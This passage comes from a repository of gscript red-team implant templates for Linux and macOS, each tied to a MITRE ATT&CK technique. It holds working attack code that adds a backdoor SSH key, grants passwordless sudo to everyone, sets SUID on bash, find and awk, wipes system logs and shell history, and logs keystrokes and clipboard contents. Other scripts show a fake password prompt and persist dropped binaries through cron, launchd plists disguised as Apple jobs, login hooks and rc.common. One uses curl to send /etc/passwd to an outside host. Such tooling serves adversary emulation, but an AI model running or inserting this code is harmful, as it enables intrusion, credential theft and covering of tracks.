// captures are written to /tmp/, alongside the dropped binary
ForkExecuteCommand(name, ["-outDir", "/tmp/", "-count", "48", "-delay", "1800s"]);
return true;
}
33 |
// AfterDeploy: final hook; logs completion and reports success.
function AfterDeploy() {
  var done = true;
  LogInfo("Done GoRedSpy");
  return done;
}
38 |
--------------------------------------------------------------------------------
/beta/attack/linux/sshkey_persistence.gs:
--------------------------------------------------------------------------------
1 | // Title: SSH Key Persistence
2 | // Author: micahjmartin
3 | // Purpose: add a public ssh key to users accounts
4 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1145
5 |
6 | //import:/root/.ssh/id_rsa.pub
7 |
8 | // NOTE: You will need to update the path to the public key in order to import without an error
9 |
// BeforeDeploy: no preconditions; always allows deployment.
function BeforeDeploy() {
  var proceed = true;
  return proceed;
}
13 |
// Deploy: appends the bundled id_rsa.pub asset to USER_INFO.home_dir/.ssh/authorized_keys
// when that file exists, otherwise creates it with the key as its only content.
// The LogInfo lines run before the write and neither write result is checked,
// so success is reported unconditionally; always returns true.
// NOTE(review): no newline is inserted before the appended key, so if the
// existing file lacks a trailing newline the key is joined onto its last line.
// NOTE(review): the create branch passes 400 (decimal, = 0620 octal) where the
// sibling scripts pass octal literals such as 0755 — confirm how WriteFile
// interprets the mode argument.
function Deploy() {
var filename = USER_INFO.home_dir + "/.ssh/authorized_keys";
var stat = FileExists(filename);
if (stat.fileExists) {
LogInfo("SSH key appended");
AppendFileBytes(filename, Asset("id_rsa.pub").fileData);
} else {
LogInfo("SSH key added");
WriteFile(filename, Asset("id_rsa.pub").fileData, 400);
}
return true;
}
26 |
// AfterDeploy: no post-deploy work; always reports success.
function AfterDeploy() {
  var done = true;
  return done;
}
30 |
--------------------------------------------------------------------------------
/beta/attack/linux/sudo_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Sudo Persistence
3 | // Author: ahhh
4 | // Purpose: adds everyone to the sudo group so they can easily priv esc
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1169
7 | // Note: must run implant as root
8 |
9 | //priority:100
10 | //timeout:150
11 |
// BeforeDeploy: requires the implant to run as root. Any other user is
// logged, Halt() is called and the hook returns false; root returns true.
function BeforeDeploy() {
  LogInfo("starting execution of Sudo Persistence");
  var current = GetUser();
  LogInfo("Our user is: "+current.username);
  if (current.username != "root") {
    LogInfo("Detected a non-root user, this needs to run as root!");
    Halt();
    return false;
  }
  return true;
}
25 |
// Deploy: appends the sudoers rule "ALL ALL=(ALL:ALL) NOPASSWD:ALL" to both
// /etc/sudoers and /etc/sudoers.d/README. Each AppendFileBytes result's
// fileError is logged but not acted on; always returns true.
// NOTE(review): the appended bytes carry no leading or trailing newline, so
// the rule is joined onto whatever the file's last line is; a sudoers file
// that fails to parse as a result can make sudo refuse to run at all.
function Deploy() {
// setting ALL to be able to sudo on every command
// echo 'ALL ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
// echo 'ALL ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers.d/README

var sudo_bytes = StringToByteArray("ALL ALL=(ALL:ALL) NOPASSWD:ALL");
var obj = AppendFileBytes("/etc/sudoers", sudo_bytes);
LogInfo(obj.fileError);
var obj2 = AppendFileBytes("/etc/sudoers.d/README", sudo_bytes);
LogInfo(obj2.fileError);
LogInfo("Set ALL to be able to sudo on every command ");

return true;
}
40 |
// AfterDeploy: final hook; logs completion and reports success.
function AfterDeploy() {
  var done = true;
  LogInfo("done Sudo Persistence");
  return done;
}
--------------------------------------------------------------------------------
/beta/attack/linux/suid_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: SUID Persistence
3 | // Author: ahhh
4 | // Purpose: sets the sticky bit on bash as root, for easy future priv esc
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1166
7 | // Note: must run implant as root, later need to invoke "/bin/bash -p" to use SUID backdoor
8 |
9 | //priority:100
10 | //timeout:150
11 |
// BeforeDeploy: requires the implant to run as root. Any other user is
// logged, Halt() is called and the hook returns false; root returns true.
function BeforeDeploy() {
  LogInfo("starting execution of SUID Persistence");
  var current = GetUser();
  LogInfo("Our user is: "+current.username);
  if (current.username != "root") {
    LogInfo("Detected a non-root user, this needs to run as root!");
    Halt();
    return false;
  }
  return true;
}
25 |
// Deploy: forks `chmod u+s` followed by `chmod u+x` on /bin/bash,
// /usr/bin/find and /usr/bin/awk. No ForkExecuteCommand result is checked,
// so the LogInfo lines report success unconditionally; always returns true.
function Deploy() {
// setting /bin/bash to U+S
ForkExecuteCommand("chmod", ["u+s", "/bin/bash"]);
ForkExecuteCommand("chmod", ["u+x", "/bin/bash"]);
LogInfo("Set /bin/bash");

// setting /usr/bin/find to U+S
// (the log text below still says /bin/zsh; the target here is find)
ForkExecuteCommand("chmod", ["u+s", "/usr/bin/find"]);
ForkExecuteCommand("chmod", ["u+x", "/usr/bin/find"]);
LogInfo("Set /bin/zsh");

// setting awk
// USAGE: awk '{ system("/bin/sh") }'
ForkExecuteCommand("chmod", ["u+s", "/usr/bin/awk"]);
ForkExecuteCommand("chmod", ["u+x", "/usr/bin/awk"]);
LogInfo("Set /usr/bin/awk");

return true;
}
45 |
// AfterDeploy: final hook; logs completion and reports success.
function AfterDeploy() {
  var done = true;
  LogInfo("done SUID Persistence");
  return done;
}
50 |
--------------------------------------------------------------------------------
/beta/attack/os_x/cronjob_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Persistence_osx_cronjob
3 | // Author: Jay Hill
4 | // Purpose: cron job persistence on osx
5 | // Gscript version: 0.1.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1168
7 |
8 | //priority:150
9 | //timeout:150
10 | //import:/private/tmp/example.macho
11 |
// BeforeDeploy: logs the start marker; no preconditions are checked.
function BeforeDeploy() {
  var proceed = true;
  LogInfo("Start Cron Job on Osx");
  return proceed;
}
16 |
// Deploy: writes the bundled example.macho asset to /private/tmp/<5 random
// alphanumerics> (mode 0755), then writes a crontab file to /tmp/pe and
// installs it with `crontab /tmp/pe`, which replaces the invoking user's
// existing crontab rather than appending to it.
// NOTE(review): the file installed is shim_bytes (the `say "bingo"` line);
// cron_bytes, the entry that would run the dropped binary, is built but never
// written, so the dropped binary is not scheduled by this function.
// No write or command result is checked; always returns true.
function Deploy() {

// Drop the Sample
var example = Asset("example.macho");
var name = "";
var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
// Math.random() is a non-cryptographic generator; it is only used for a file name here
for (var i = 0; i < 5; i++)
name += possible.charAt(Math.floor(Math.random() * possible.length));
name = "/private/tmp/"+name;
// 0755 is a legacy octal literal (ES5 non-strict); invalid under strict mode
WriteFile(name, example.fileData, 0755);
LogInfo("dropped the example binary here: "+name);

// Shim Command
// every-minute entry; note the CRLF line ending
var shim_command = 'say "bingo"\r\n';
var shim_bytes = StringToByteArray("* * * * * "+shim_command);

// Write the Cron Command
// cron_bytes is unused below — shim_bytes is what gets written
var cron_bytes = StringToByteArray("* * * * * "+name);
WriteFile("/tmp/pe", shim_bytes, 0755);

// Issue the Cron Command
ExecuteCommand("crontab", ["/tmp/pe"]);
return true;
}
41 |
// AfterDeploy: final hook; logs completion and reports success.
function AfterDeploy() {
  var done = true;
  LogInfo("Done Cron Job on Osx");
  return done;
}
46 |
--------------------------------------------------------------------------------
/beta/attack/os_x/delete_logs.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Delete Logs
3 | // Author: Jay Hill
4 | // Purpose: Deletes a number of critical security logs on a linux machine, to see if this is detected by the lack of logs or deletion
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1146
7 | // Note: must run implant as root
8 |
9 | //priority:150
10 | //timeout:150
11 |
// Pre-deploy gate: the log removal below only works as root, so any other
// user is reported, the script is halted and deployment is refused.
function BeforeDeploy() {
  LogInfo("starting execution of Delete Logs");
  var current = GetUser();
  LogInfo("Our user is: " + current.username);
  if (current.username !== "root") {
    LogInfo("Detected a non-root user, this needs to run as root!");
    Halt();
    return false;
  }
  return true;
}
25 |
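// Removes the login-accounting files (utmp/wtmp/btmp), the whole /var/log
// tree and root's shell history. Requires root (gated in BeforeDeploy).
//
// Both removals are forked, so the log lines record that rm was LAUNCHED,
// not that it finished; the original logged them as already done. `-P` is
// the BSD "overwrite before unlink" flag, which makes this slow on a big
// log tree.
// Fix: the original removed only /var/root/.sh_history (the sh/ksh name)
// while logging "bash history"; bash writes .bash_history, so both are
// removed now.
function Deploy() {
  ForkExecuteCommand("rm", ["-rf", "-P", "/var/run/utmp", "/var/run/wtmp", "/var/run/btmp", "/var/log/"]);
  LogInfo("Launched removal of /var/run/utmp, /var/run/wtmp, /var/run/btmp, and all of /var/log/");

  // Root's home on macOS is /var/root.
  ForkExecuteCommand("rm", ["-rf", "-P", "/var/root/.sh_history", "/var/root/.bash_history"]);
  LogInfo("Launched removal of root's .sh_history and .bash_history");
  return true;
}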
34 |
// Post-deploy hook: logs completion only.
function AfterDeploy() {
  var banner = "done Delete Logs";
  LogInfo(banner);
  return true;
}
39 |
--------------------------------------------------------------------------------
/beta/attack/os_x/enable_remote_ssh.gs:
--------------------------------------------------------------------------------
1 | // enable remote ssh
2 | // Title: enable remote ssh
3 | // Author: jayhill
4 | // Purpose:To quickly turn on SSH server and allow incoming ssh connections to the current Mac.
5 | // Gscript version: 0.1.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1021
7 |
8 | //priority:150
9 | //timeout:150
10 |
// Pre-deploy gate: systemsetup needs root, so halt and refuse deployment for
// any other user.
function BeforeDeploy() {
  LogInfo("Enabling remoteSSH connection");
  var current = GetUser();
  LogInfo("Our user is: " + current.username);
  if (current.username !== "root") {
    LogInfo("Detected a non-root user, this needs to run as root!");
    Halt();
    return false;
  }
  return true;
}
24 |
// Turns on "Remote Login" (the sshd launchd job) through systemsetup. The
// command is forked, so its exit status is not observed here.
function Deploy() {
  var args = ["-setremotelogin", "on"];
  ForkExecuteCommand("systemsetup", args);
  return true;
}
29 |
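// Post-deploy hook. The original repeated the BeforeDeploy message
// ("Enabling remoteSSH connection"), which made the log look as if the step
// ran twice; report completion instead.
function AfterDeploy() {
  LogInfo("Done enabling remoteSSH connection");
  return true;
}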
34 |
--------------------------------------------------------------------------------
/beta/attack/os_x/example_agent.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Label
6 | com.apple.updates
7 | ProgramArguments
8 |
9 | /usr/local/agent_example
10 |
11 | RunAtLoad
12 |
13 |
14 |
--------------------------------------------------------------------------------
/beta/attack/os_x/example_daemon.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Label
6 | com.apple.updatesd
7 | UserName
8 | root
9 | GroupName
10 | wheel
11 | Nice
12 | 20
13 | KeepAlive
14 |
15 | OnDemand
16 |
17 | RunAtLoad
18 |
19 | AbandonProcessGroup
20 |
21 | WorkingDirectory
22 | /usr/local/
23 | ProgramArguments
24 |
25 | /usr/local/daemon_example
26 |
27 | StandardErrorPath
28 | /Library/Logs/error.log
29 | StandardOutPath
30 | /Library/Logs/output.log
31 | ProcessType
32 | Background
33 |
34 |
35 |
--------------------------------------------------------------------------------
/beta/attack/os_x/grab_clipboard.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Grab Clipboard
3 | // Author: ahhh
4 | // Purpose: Grabs the contents of the clipboard to be written to a file or exfiltrated
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1115
7 |
8 | //priority:150
9 | //timeout:150
10 |
// Pre-deploy hook: logs the start of the clipboard grab; never blocks.
function BeforeDeploy() {
  var banner = "Starting Clipboard Data";
  LogInfo(banner);
  return true;
}
15 |
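// Reads the general pasteboard with pbpaste and writes it to the implant log.
//
// Fix: the original passed [""] as the argument list, i.e. one empty-string
// argument. That is not a pbpaste option and can trip its usage handling;
// pbpaste needs no arguments to dump the general pasteboard.
// Caveat: clipboard contents routinely include passwords and tokens, so the
// log channel this lands in must be treated as sensitive.
function Deploy() {
  var response = ExecuteCommand("pbpaste", []);
  LogInfo(response.retObject.Stdout);
  return true;
}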
21 |
// Post-deploy hook: logs completion only.
function AfterDeploy() {
  var banner = "Done Clipboard Data";
  LogInfo(banner);
  return true;
}
--------------------------------------------------------------------------------
/beta/attack/os_x/https_log_exfiltration.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: HTTPS Log Exfiltration
3 | // Author: ahhh
4 | // Purpose: read a file, hex-encode it with xxd (16 bytes per line, not base64), and request each line as a URL path on a web server so the data is captured in that server's access logs
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1048
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.macho
11 |
// Exfil endpoint. Deploy appends each hex chunk of the target file to this
// URL as a path component, so it must end in "/" for the chunks to be
// separate paths in the server's access log.
var url = "https://example.com/";
// Local file to read out. Deploy splices it into an `sh -c` pipeline.
var target_file = "/etc/passwd";
14 |
// Pre-deploy hook: logs the start of the exfiltration step; never blocks.
function BeforeDeploy() {
  var banner = "starting HTTPS Log Exfiltration";
  LogInfo(banner);
  return true;
}
19 |
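// Exfiltrates target_file through the remote web server's access log: the
// file is hex-encoded by xxd (not base64, despite the file header), 16 bytes
// per line, and each line is requested as a URL path under `url`. The server
// side reassembles with the reverse of `xxd -ps` (`xxd -r -p`).
//
// Fix: target_file was spliced into the `sh -c` string unquoted, so a path
// with spaces or shell metacharacters would break the pipeline (or be
// interpreted by it). It is now single-quoted with embedded quotes escaped.
function Deploy() {
  var quotedFile = "'" + String(target_file).replace(/'/g, "'\\''") + "'";
  // "$i" is expanded by sh inside the loop, not here, so it stays in double
  // quotes in the shell string.
  var target_url = url + "$i";
  var command = "/bin/cat " + quotedFile + " | xxd -ps -c 16 | while read i; do curl \"" + target_url + "\"; done;";
  var response = ExecuteCommand("sh", ["-c", command]);
  // Both streams are logged so a DNS/TLS failure from curl is visible.
  LogInfo(response.retObject.Stderr);
  LogInfo(response.retObject.Stdout);
  return true;
}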
31 |
// Post-deploy hook: logs completion only.
function AfterDeploy() {
  var banner = "done, HTTPS Log Exfiltration";
  LogInfo(banner);
  return true;
}
--------------------------------------------------------------------------------
/beta/attack/os_x/keylog_spy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Keylog Spy
3 | // Author: ahhh
4 | // Purpose: Starts recording keystrokes; Deploy passes /private/tmp/key.log as the log path (a world-readable location)
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1056
7 | // Using this keylogger: https://github.com/caseyscarborough/keylogger
8 |
9 | //priority:150
10 | //timeout:150
11 | //import:/private/tmp/keylogger.macho
12 |
13 |
// Pre-deploy hook: logs the start of the keylogger drop; never blocks.
function BeforeDeploy() {
  var banner = "Starting keylogger spy";
  LogInfo(banner);
  return true;
}
18 |
// Drops the bundled keylogger under a random 6-character name in
// /private/tmp and forks it with the log path as its single argument, so
// keystrokes land in /private/tmp/key.log (world-readable) after Deploy
// has returned.
function Deploy() {
  var alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  var execMode = parseInt("755", 8); // 0755

  // Random drop name; Math.random is enough, the name only needs to be
  // unlikely to collide.
  var suffix = "";
  for (var idx = 0; idx < 6; idx++) {
    suffix += alphabet.charAt(Math.floor(Math.random() * alphabet.length));
  }
  var dropPath = "/private/tmp/" + suffix;

  var spy = Asset("keylogger.macho");
  WriteFile(dropPath, spy.fileData, execMode);
  LogInfo("dropped the spy binary here: " + dropPath);

  ForkExecuteCommand(dropPath, ["/private/tmp/key.log"]);
  return true;
}
33 |
// Post-deploy hook: logs completion; the forked keylogger keeps running.
function AfterDeploy() {
  var banner = "Done keylogger spy";
  LogInfo(banner);
  return true;
}
38 |
--------------------------------------------------------------------------------
/beta/attack/os_x/launch_agent_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Launch Agent Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and a launch agent plist and persist it using Launch Agent
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1159
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.macho
11 | //import:/private/tmp/example_agent.plist
12 |
// Filename the agent plist is written under. It mimics an Apple job name;
// the bundled example_agent.plist carries the matching Label com.apple.updates.
var plist_name = "com.apple.updates.plist";
14 |
// Pre-deploy hook: logs the start of the launch-agent step; never blocks.
function BeforeDeploy() {
  var banner = "starting execution of Launch Agent Persistence";
  LogInfo(banner);
  return true;
}
19 |
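// Drops the sample binary and installs the bundled agent plist into the
// current user's ~/Library/LaunchAgents, then loads it with launchctl.
//
// Fixes over the original:
//  - the /System/Library/LaunchAgents and /Library/LaunchAgents paths were
//    computed but never used (and /System/... is SIP-protected); dropped.
//  - the plist is written 0644 instead of 0755: it is data, not a program.
//  - console.log replaced by LogInfo like the rest of the script.
// NOTE(review): the bundled example_agent.plist points its ProgramArguments
// at /usr/local/agent_example, while this script drops the binary at
// /private/tmp/agent_example -- one of the two must be aligned or launchd
// will start a file that is not there.
function Deploy() {
  var execMode = parseInt("755", 8);  // 0755; legacy octal literals are invalid in strict mode
  var plistMode = parseInt("644", 8); // 0644

  // Drop the sample.
  var example = Asset("example.macho");
  var name = "/private/tmp/agent_example";
  WriteFile(name, example.fileData, execMode);
  LogInfo("dropped the example binary here: " + name);

  // Install and load the per-user agent plist. `-w` records the job as
  // enabled (overrides a Disabled key) so it is picked up on later logins.
  var example_agent = Asset("example_agent.plist");
  var whoami = GetUser();
  var location = "/Users/" + whoami.username + "/Library/LaunchAgents/" + plist_name;
  WriteFile(location, example_agent.fileData, plistMode);
  ExecuteCommand("launchctl", ["load", "-w", location]);
  LogInfo("Persisted binary using Launch Agent, with the plist: " + location);
  return true;
}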
40 |
// Post-deploy hook: logs completion; the agent stays installed.
function AfterDeploy() {
  var banner = "done, deployed binary with Launch Agent persistence";
  LogInfo(banner);
  return true;
}
--------------------------------------------------------------------------------
/beta/attack/os_x/launch_daemon_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Launch Daemon Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and a launch daemon plist and persist it using Launch Daemon
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1160
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.macho
11 | //import:/private/tmp/example_daemon.plist
12 |
// Filename the daemon plist is written under. It mimics an Apple job name;
// the bundled example_daemon.plist carries the matching Label com.apple.updatesd.
var plist_name = "com.apple.updatesd.plist";
14 |
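// Pre-deploy gate. Writing /Library/LaunchDaemons and loading a daemon with
// launchctl only works as root, so halt and refuse deployment for any other
// user -- the same gate delete_logs.gs and enable_remote_ssh.gs use. The
// original had no check and would fail silently inside Deploy.
function BeforeDeploy() {
  LogInfo("starting execution of Launch Daemon Persistence");
  var current = GetUser();
  LogInfo("Our user is: " + current.username);
  if (current.username !== "root") {
    LogInfo("Detected a non-root user, this needs to run as root!");
    Halt();
    return false;
  }
  return true;
}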
19 |
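// Drops the sample binary and installs the bundled daemon plist into
// /Library/LaunchDaemons, then loads it with launchctl (root required).
//
// Fixes over the original:
//  - the /System/Library/LaunchDaemons path was computed but never used
//    (and is SIP-protected anyway); dropped.
//  - the plist is written 0644 instead of 0755: it is data, not a program.
//  - console.log replaced by LogInfo like the rest of the script.
// NOTE(review): the bundled example_daemon.plist points ProgramArguments at
// /usr/local/daemon_example, while this script drops the binary at
// /private/tmp/daemon_example -- align one of the two or launchd will start
// a file that is not there.
function Deploy() {
  var execMode = parseInt("755", 8);  // 0755; legacy octal literals are invalid in strict mode
  var plistMode = parseInt("644", 8); // 0644

  // Drop the sample.
  var example = Asset("example.macho");
  var name = "/private/tmp/daemon_example";
  WriteFile(name, example.fileData, execMode);
  LogInfo("dropped the example binary here: " + name);

  // Install and load the system daemon plist. `-w` records the job as
  // enabled so it is started again at boot.
  var example_daemon = Asset("example_daemon.plist");
  var location = "/Library/LaunchDaemons/" + plist_name;
  WriteFile(location, example_daemon.fileData, plistMode);
  ExecuteCommand("launchctl", ["load", "-w", location]);
  LogInfo("Persisted binary using Launch Daemon, with the plist: " + location);
  return true;
}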
37 |
// Post-deploy hook: logs completion; the daemon stays installed.
function AfterDeploy() {
  var banner = "done, deployed binary with Launch Daemon persistence";
  LogInfo(banner);
  return true;
}
--------------------------------------------------------------------------------
/beta/attack/os_x/launchctl_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Launchctl Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using Launchctl
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1152
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.macho
11 |
// Declared but not referenced anywhere in this script: Deploy builds its own
// random label and passes no extra arguments to the sample.
var labelname;
var binary_args = "";
14 |
// Pre-deploy hook: logs the start of the launchctl step; never blocks.
function BeforeDeploy() {
  var banner = "starting execution of Launchctl Persistence";
  LogInfo(banner);
  return true;
}
19 |
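// Drops the sample under a random name in /private/tmp and registers it with
// launchd via `launchctl submit` under a random com.apple.* label.
//
// Fix: the success message went through console.log while every other
// message in this script goes through LogInfo; it now uses LogInfo too.
// NOTE(review): `launchctl submit` registers the job with the running
// launchd only (no plist is written); confirm it survives a reboot before
// relying on it as persistence.
function Deploy() {
  var alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  var execMode = parseInt("755", 8); // 0755; legacy octal literals are invalid in strict mode

  // Random alphanumeric token of the requested length (both the file name
  // and the label use the same generator).
  function randomToken(length) {
    var token = "";
    for (var i = 0; i < length; i++) {
      token += alphabet.charAt(Math.floor(Math.random() * alphabet.length));
    }
    return token;
  }

  // Drop the sample.
  var example = Asset("example.macho");
  var name = "/private/tmp/" + randomToken(5);
  WriteFile(name, example.fileData, execMode);
  LogInfo("dropped the example binary here: " + name);

  // Register it with launchd under an Apple-looking label.
  var label = "com.apple." + randomToken(5);
  ExecuteCommand("launchctl", ["submit", "-l", label, "--", name]);
  LogInfo("Persisted binary using launchctl, with the label: " + label);
  return true;
}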
41 |
// Post-deploy hook: logs completion only.
function AfterDeploy() {
  var banner = "done, deployed binary with Launchctl persistence";
  LogInfo(banner);
  return true;
}
--------------------------------------------------------------------------------
/beta/attack/os_x/loginhook_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: LoginHook Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using a default Login Hook
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1037
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.macho
11 |
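// Pre-deploy gate. Apple's documented LoginHook setup runs `defaults write
// com.apple.loginwindow LoginHook ...` as root (the hook is read from root's
// loginwindow preferences, not the user's), so halt for any other user, the
// same way the other root-only scripts in this directory do. The original
// had no check and would write an ineffective per-user preference instead.
function BeforeDeploy() {
  LogInfo("starting execution of Login Hook Persistence");
  var current = GetUser();
  LogInfo("Our user is: " + current.username);
  if (current.username !== "root") {
    LogInfo("Detected a non-root user, this needs to run as root!");
    Halt();
    return false;
  }
  return true;
}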
16 |
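// Drops the sample under a random name in /private/tmp and registers it as
// the loginwindow LoginHook, so loginwindow runs it (as root) at every login.
//
// Fix: the success message went through console.log while the rest of the
// script uses LogInfo; it now uses LogInfo too.
function Deploy() {
  var alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  var execMode = parseInt("755", 8); // 0755; legacy octal literals are invalid in strict mode

  // Drop the sample.
  var example = Asset("example.macho");
  var token = "";
  for (var i = 0; i < 5; i++) {
    token += alphabet.charAt(Math.floor(Math.random() * alphabet.length));
  }
  var name = "/private/tmp/" + token;
  WriteFile(name, example.fileData, execMode);
  LogInfo("dropped the example binary here: " + name);

  // Register it as the login hook (must run as root to take effect).
  ExecuteCommand("defaults", ["write", "com.apple.loginwindow", "LoginHook", name]);
  LogInfo("Persisted binary using com.apple.loginwindow LoginHook");
  return true;
}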
34 |
// Post-deploy hook: logs completion only.
function AfterDeploy() {
  var banner = "done, deployed binary with Login Hook persistence";
  LogInfo(banner);
  return true;
}
--------------------------------------------------------------------------------
/beta/attack/os_x/logouthook_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: LogoutHook Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using a default Logout Hook
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1037
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.macho
11 |
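// Pre-deploy gate. Like LoginHook, the LogoutHook key is read from root's
// loginwindow preferences and Apple's documented setup writes it as root, so
// halt for any other user (same gate as the other root-only scripts here).
// The original had no check.
function BeforeDeploy() {
  LogInfo("starting execution of LogoutHook Persistence");
  var current = GetUser();
  LogInfo("Our user is: " + current.username);
  if (current.username !== "root") {
    LogInfo("Detected a non-root user, this needs to run as root!");
    Halt();
    return false;
  }
  return true;
}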
16 |
// Drops the sample under a random name in /private/tmp and registers it as
// the loginwindow LogoutHook, so it is executed when the user logs out.
function Deploy() {
  var alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  var execMode = parseInt("755", 8); // 0755

  // Random 5-character drop name.
  var token = "";
  for (var idx = 0; idx < 5; idx++) {
    token += alphabet.charAt(Math.floor(Math.random() * alphabet.length));
  }
  var dropPath = "/private/tmp/" + token;

  var example = Asset("example.macho");
  WriteFile(dropPath, example.fileData, execMode);
  LogInfo("dropped the example binary here: " + dropPath);

  // The domain is the existing com.apple.loginwindow preferences; only the
  // LogoutHook key is added.
  ExecuteCommand("defaults", ["write", "com.apple.loginwindow", "LogoutHook", dropPath]);
  LogInfo("Persisted binary using com.apple.loginwindow LogoutHook");
  return true;
}
34 |
// Post-deploy hook: logs completion only.
function AfterDeploy() {
  var banner = "done, deployed binary with LogoutHook persistence";
  LogInfo(banner);
  return true;
}
39 |
--------------------------------------------------------------------------------
/beta/attack/os_x/osascript_prompt.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Osascript Prompt
3 | // Author: ahhh
4 | // Purpose: Prompts the user for their password with the builtin Osascript
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1141
7 |
8 | //priority:150
9 | //timeout:150
10 |
// Pre-deploy hook: logs the start of the prompt step; never blocks.
function BeforeDeploy() {
  var banner = "Starting Osascript Prompt";
  LogInfo(banner);
  return true;
}
15 |
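// Shows a fake "Software Update" password dialog via osascript, parented to
// System Preferences so it looks legitimate, and logs what the user typed.
//
// Fix: the original passed the `activate` statement twice (`-e first -e
// first`); one activation is enough.
// Caveat: response.retObject.Stdout carries the user's typed text (osascript
// prints the dialog result, typically including "text returned:..."). That
// is a real credential landing in the implant log; protect and scrub that
// channel after the exercise.
function Deploy() {
  var activate = 'tell app "System Preferences" to activate';
  var prompt = 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"';
  var response = ExecuteCommand("osascript", ["-e", activate, "-e", prompt]);
  LogInfo(response.retObject.Stdout);
  return true;
}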
23 |
// Post-deploy hook: logs completion only.
function AfterDeploy() {
  var banner = "Done Osascript Prompt";
  LogInfo(banner);
  return true;
}
--------------------------------------------------------------------------------
/beta/attack/os_x/rccommon_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: rc.common Persistence
3 | // Author: ahhh
4 | // Purpose: rc.common Persistence
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1163
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //import:/private/tmp/merlinagent.macho
12 | //import:/private/tmp/merlin_osx_runner.sh
13 |
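// Pre-deploy gate. Deploy writes into /Library and appends to /etc/rc.common,
// both root-owned, so halt for any other user the way the other root-only
// scripts in this directory do. The original had no check.
function BeforeDeploy() {
  LogInfo("Starting rc.common persistence");
  var current = GetUser();
  LogInfo("Our user is: " + current.username);
  if (current.username !== "root") {
    LogInfo("Detected a non-root user, this needs to run as root!");
    Halt();
    return false;
  }
  return true;
}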
18 |
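// Drops a Merlin agent and its runner script into /Library and hooks the
// runner into /etc/rc.common.
//
// Fixes over the original:
//  - the FileExists result was fetched but never checked, and "file already
//    exists, so appending" was logged unconditionally. The branch is now
//    real, mirroring tamper_histcontrol.gs in this directory.
//  - the appended text had no newline on either side, so it fused onto
//    rc.common's last line if that line was unterminated; it is now framed
//    with "\n".
// NOTE(review): rc.common is a legacy hook; confirm the target macOS version
// still sources it before relying on this for persistence.
function Deploy() {
  var execMode = parseInt("755", 8); // 0755; legacy octal literals are invalid in strict mode
  var dataMode = parseInt("644", 8); // 0644

  // Drop the agent.
  var merlin = Asset("merlinagent.macho");
  var fn = "/Library/merlin";
  WriteFile(fn, merlin.fileData, execMode);
  LogInfo("dropped a merlin agent");

  // Drop the runner script that starts the agent.
  var script = Asset("merlin_osx_runner.sh");
  var fn2 = "/Library/runner";
  WriteFile(fn2, script.fileData, execMode);
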